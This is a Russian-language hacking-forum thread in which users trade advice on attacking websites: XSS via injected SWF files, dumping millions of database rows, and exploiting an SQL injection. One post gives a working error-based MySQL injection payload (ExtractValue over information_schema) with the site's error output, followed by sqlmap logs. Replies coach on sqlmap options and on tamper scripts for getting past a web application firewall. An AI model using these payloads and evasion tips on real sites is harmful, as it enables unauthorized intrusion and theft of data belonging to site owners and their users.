Вопросы по уязвимостям

[NameSpace]

Цитата:

Сообщение от crlf

Пробовал заинжектить сжатую SWF c XSS, но скрипт не выполняется если подгружать с другого домена. Есть варианты как это можно использовать?

Непосредственно можно использовать это как XSS в IE. В SWF выполнить Javascript через ExternalInterface не получится, но можно полноценно обмениваться запросами с сервером. Хотя сегодня Flash настолько дырявый, что будет легче сразу выполнить свой код у атакуемого пользователя.

[crlf]

Цитата:

Сообщение от NameSpace

Непосредственно можно использовать это как XSS в IE. В SWF выполнить Javascript через ExternalInterface не получится, но можно полноценно обмениваться запросами с сервером. Хотя сегодня Flash настолько дырявый, что будет легче сразу выполнить свой код у атакуемого пользователя.

Нашёл интересный вектор https://miki.it/blog/2014/7/8/abusin...rosetta-flash/, жаль что пофиксили, но на интересные мысли навёл. Попробую поискать нечто подобное.

[SynQ]

Цитата:

Сообщение от Лаврушкин

Не уверен, но посмотри http://www.slideshare.net/qqlan/database-honeypot-by-design-25195927
В подробностях не разбирал.

Вот это стоит в шпаргалку перепостить.

[snakes]

Подскажите чем быстро можно сдампить 2кк записей, и как много времени займет этот процесс? Есть только скуль, к пхпмайадмин нет доступа.

[NameSpace]

Цитата:

Сообщение от snakes

Подскажите чем быстро можно сдампить 2кк записей, и как много времени займет этот процесс? Есть только скуль, к пхпмайадмин нет доступа.

Используйте векторы вытягивания данных колонок в 1-у строку.

В настоящее время список актуальных векторов можно посмотреть здесь: https://rdot.org/forum/showthread.php?t=2860

[snakes]

Цитата:

Сообщение от NameSpace

Используйте векторы вытягивания данных колонок в 1-у строку.

В настоящее время список актуальных векторов можно посмотреть здесь: https://rdot.org/forum/showthread.php?t=2860

А попроще? Софтом по типу Хави, есть что то такое?

[xivi00]

Есть скуля site.com/'
кртиться через error baze site.com/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1
вот вывод Erreur SQL : XPATH syntax error: ':SESSION_STATUS' (1105)
SELECT apres FROM `sos`.`redirection` WHERE LCID=2057 AND avant = '/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1'
------------------------------------------------------------------------------------
но немогу не хавиджем не sqlmap ом раскрутить пробовал все уровни риски нечего, неоднаивестная миру программа не крутит, в чем может быть причина?

[Mustang]

Цитата:

Сообщение от xivi00

Есть скуля site.com/'
кртиться через error baze site.com/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1
вот вывод Erreur SQL : XPATH syntax error: ':SESSION_STATUS' (1105)
SELECT apres FROM `sos`.`redirection` WHERE LCID=2057 AND avant = '/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1'
------------------------------------------------------------------------------------
но немогу не хавиджем не sqlmap ом раскрутить пробовал все уровни риски нечего, неоднаивестная миру программа не крутит, в чем может быть причина?

А желательно бы запрос скинуть с sqlmap'а. Обычно в уязвимом в месте без параметров ставиться *. Запрос получиться примерно таким:

Код:

sqlmap -u "site.com/*"

Желательно сразу указать тип БД. Еще бывает такое, что сайт проверяет, например, user_agent, или необходимые куки. Попробуй курлом отправить запрос и посмотри чего сайт скажет.

[xivi00]

Цитата:

Сообщение от Mustang

А желательно бы запрос скинуть с sqlmap'а. Обычно в уязвимом в месте без параметров ставиться *. Запрос получиться примерно таким:

Код:

sqlmap -u "site.com/*"

Желательно сразу указать тип БД. Еще бывает такое, что сайт проверяет, например, user_agent, или необходимые куки. Попробуй курлом отправить запрос и посмотри чего сайт скажет.

* ставлю это я в курсе, так же как и в хавидже %Inject_Here%
вот что говорит sqlmap

Код:

[13:56:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[13:56:16] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[13:56:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[13:56:44] [WARNING] URI parameter '#1*' is not injectable
[13:56:44] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
[13:56:44] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 4 times, 404 (Not Found) - 221 times

[sT1myL]

403 (Forbidden) - 4 times, 404 (Not Found) - 221 times WAF надо использовать скрипты для обхода